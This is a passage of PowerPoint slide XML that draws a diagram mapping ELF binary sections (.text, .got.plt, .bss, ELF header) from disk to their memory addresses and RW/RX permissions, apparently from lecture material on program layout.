                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DC2CBF9-E21C-48AD-8569-4F9B50ABA1E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="13" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5579150" y="1761175"/>
              <a:ext cx="0" cy="367800"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="Shape 751">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E80FE881-313C-474F-B090-9586544F7ED9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="16" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5579150" y="3077575"/>
              <a:ext cx="0" cy="334200"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Shape 752">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB3339EC-C1FE-4AF0-96D7-86ADFB18395E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="1085100"/>
              <a:ext cx="1047000" cy="274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latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0xFFFFFFFF</a:t>
              </a:r>
              <a:endParaRPr sz="1000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Shape 753">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89AEC428-84EE-42EB-9CB0-38DC942D41B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="1359300"/>
              <a:ext cx="1047000" cy="274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latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0xC0000000</a:t>
              </a:r>
              <a:endParaRPr sz="1000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Shape 754">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E23F1A5D-9C35-4822-BED5-F09A0BF4E96C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="2674225"/>
              <a:ext cx="1047000" cy="274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latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0x40000000</a:t>
              </a:r>
              <a:endParaRPr sz="1000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Shape 755">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1599F529-BFA5-4492-89D1-C9B84595ADE6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4058550"/>
              <a:ext cx="1047000" cy="274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latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0x08048000</a:t>
              </a:r>
              <a:endParaRPr sz="1000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="26" name="Shape 756">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02CB3132-6F87-44F7-86BB-A45C4F89CCD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1218750"/>
              <a:ext cx="358500" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="27" name="Shape 757">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55AFF7F8-A0A7-4552-9B06-FB5BF3290976}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1492950"/>
              <a:ext cx="358500" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="28" name="Shape 758">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0228E6C0-C255-441C-933B-11D668E2B58E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="2807875"/>
              <a:ext cx="358500" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Shape 759">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73BAE51A-DD40-47C5-AA6C-9A20CC5E0449}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4221500"/>
              <a:ext cx="358500" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30" name="Shape 760">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC64E16-F6E5-4F12-B821-7AA037709445}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4495700"/>
              <a:ext cx="358500" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 761">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96561190-968D-465E-B74B-FCFE807386CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4362050"/>
              <a:ext cx="1047000" cy="274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latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0x00000000</a:t>
              </a:r>
              <a:endParaRPr sz="1000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 762">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4D6AF9C-5930-4157-B3CD-59F50CF4CC9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="2570571"/>
            <a:ext cx="1762768" cy="597979"/>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other sections</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 763">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B01A4FC4-9A21-43E3-9524-362A2AAED8C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="3143271"/>
            <a:ext cx="1762768" cy="286303"/>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a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 764">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5E22253-626D-4699-B651-710FA5240417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="3417471"/>
            <a:ext cx="1762768" cy="286303"/>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.bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 765">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20D55B9A-073A-4EF4-BDA4-4F9B7D4A26C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="3691671"/>
            <a:ext cx="1762768" cy="286303"/>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.got.plt</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Shape 766">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{204E7B2E-696E-47C2-8A5F-F13B877F31EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="3965871"/>
            <a:ext cx="1762768" cy="286303"/>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.rodata</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 767">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C86299-3DCD-4BF7-9315-C5F6009304BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="4240071"/>
            <a:ext cx="1762768" cy="286303"/>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.text</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Shape 768">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{622F611F-DB18-4938-B443-5F61B8BF9D9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="4514271"/>
            <a:ext cx="1762768" cy="286303"/>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.init</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 769">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53626037-B023-4273-8188-3B29C3ED9372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="4788471"/>
            <a:ext cx="1762768" cy="286303"/>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ELF Header</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 770">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F96FAD1E-CDF1-4579-B03E-C1F4C9C64729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754731" y="3143270"/>
            <a:ext cx="369310" cy="831198"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 45447"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050"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771">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27330B4C-CC35-4AEE-AB8C-580A43F7E0AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754731" y="3974467"/>
            <a:ext cx="369310" cy="1100307"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 45447"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050"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42" name="Shape 772">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5CE0112-144D-44E6-81AB-F45B02885F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="41" idx="1"/>
            <a:endCxn id="18" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124041" y="4474524"/>
            <a:ext cx="1263973" cy="1087558"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="1155CC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Shape 773">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB1F4525-A453-4CB0-8FA8-E20B4FF2C42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="40" idx="1"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124041" y="3521025"/>
            <a:ext cx="1263973" cy="1754753"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6AA84F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Shape 774">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF84555E-43AF-4C10-A609-A8F7CD72C922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2289488" y="3417471"/>
            <a:ext cx="611383" cy="286303"/>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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>RW</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 775">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2644DF09-4943-407B-908F-35D561F70633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2289489" y="4377171"/>
            <a:ext cx="544270" cy="286303"/>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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>RX</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 776">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2AF69B0-A968-4036-8F85-C3A7FD1B533C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214563" y="2217571"/>
            <a:ext cx="1187075" cy="286303"/>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dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>In Disk</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 777">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73658F59-0947-4322-A8F5-8BC71C1930F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6542988" y="2217571"/>
            <a:ext cx="1462508" cy="286303"/>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dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>In Memory</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="Shape 778">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{638AD9FC-6BE1-45E1-838C-0A9F2D16A17A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8150459" y="5114171"/>
            <a:ext cx="1817466" cy="286303"/>
            <a:chOff x="6260750" y="4058550"/>
            <a:chExt cx="1405500" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Shape 779">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E879E40D-B995-43C7-8901-3A20C336D541}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4058550"/>
              <a:ext cx="1047000" cy="274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latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0x08049000</a:t>
              </a:r>
              <a:endParaRPr sz="1000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="50" name="Shape 780">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0773BA1-C2A0-4399-B456-43D22061529C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4221500"/>
              <a:ext cx="358500" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B4DE75-4A4A-40CE-AC81-B3599F888E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2933998" y="5167594"/>
            <a:ext cx="1980029" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
